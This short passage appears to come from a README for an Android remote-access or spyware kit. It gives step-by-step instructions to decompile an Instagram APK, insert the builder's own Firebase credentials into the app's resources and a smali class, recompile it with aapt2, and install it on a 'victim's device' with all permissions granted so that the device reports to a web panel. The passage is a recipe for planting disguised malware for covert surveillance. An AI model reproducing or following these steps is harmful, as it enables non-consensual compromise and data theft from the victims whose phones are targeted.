[*] Don't forget to add firebase url in smali_classes3/sigma/male/MainActivity.smali search for databaseURL and change it to your database url
- Download Instagram.apk
- Decompile it using any Decompiler recommend above.
- Now open
res/values/strings.xmlfile. - Replace values of
firebase_database_url,google_api_key,google_app_id,google_storage_bucket,project_idwith your Firebase Account usinggoogle-services.jsonfile which you have downloaded on step 5- Example
<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>
- Example
- Now compile the code with appt2.
- Install the app in victim's device and give all the permissions after that the connection will show up in web panel.



